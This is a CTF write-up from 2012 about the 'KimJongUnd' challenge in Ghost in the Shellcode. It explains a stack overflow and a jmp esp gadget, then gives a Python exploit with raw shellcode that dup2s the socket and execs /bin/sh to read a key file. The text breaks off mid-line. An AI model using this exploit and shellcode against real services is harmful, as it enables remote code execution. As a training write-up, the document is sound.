codezen.fr code hacking, zen coding

29 Jan 2012

GiTS 2012 KimJongUnd Write-Up

Posted by aXs

Stage 13

Question: KimJongUnd

We lost a lot of time on this exploitation challenge, for several reasons.

The vulnerability: the command line you enter after the password is copied into a stack buffer that is too small for it. A long enough input overflows the buffer, overwrites the saved return address and gives us control of EIP.

Our buffer is on the stack, so we spent some time looking for a gadget that sends execution back into it. This one does the job:

.text:08048850 55 push ebp
.text:08048851 89 E5 mov ebp, esp
.text:08048853 FF E4 jmp esp

One detail worth keeping in mind with this gadget: after the ret, esp points just past the overwritten return address, so the push ebp writes the current ebp into the return-address slot, and jmp esp then starts executing at that slot, four bytes before our shellcode. The first thing executed is therefore whatever ebp held at that point. Assuming the function restores ebp from the stack in its epilogue (the usual leave; ret), that saved ebp is also inside our overflow and holds 0x90909090, i.e. four NOPs, which is why the filler is a NOP sled rather than arbitrary bytes.

We have around 50 bytes available after the return address. Since we are in a forked daemon talking over a socket, we go for a shellcode that dup2()s the client socket onto stdin, stdout and stderr and then execve()s /bin/sh: the shell reads its command from the socket and writes the output straight back to it.

#!/usr/bin/env python

import socket
import sys
import time

if len(sys.argv) != 3:
  print '\nUsage:\t./kim.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # Creating Socket
s.connect((host, port))                                                       # Connecting to socket
crash  = '\x90' * 524                         # NOP filler up to the saved return address
crash += '\x50\x88\x04\x08'                   # 0x08048850: push ebp; mov ebp, esp; jmp esp

# dup2(4, 0); dup2(4, 1); dup2(4, 2) -- fd 4 is the client socket in the forked child
crash += '\x31\xc9\x31\xdb\xb3\x04\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5'
# execve("/bin//sh", ["/bin//sh", NULL], NULL)
crash += '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

# Left behind in the socket buffer: once the shell's stdin is the socket, this is the command it reads
crash += "        exec cat key\n"
crash += '\x<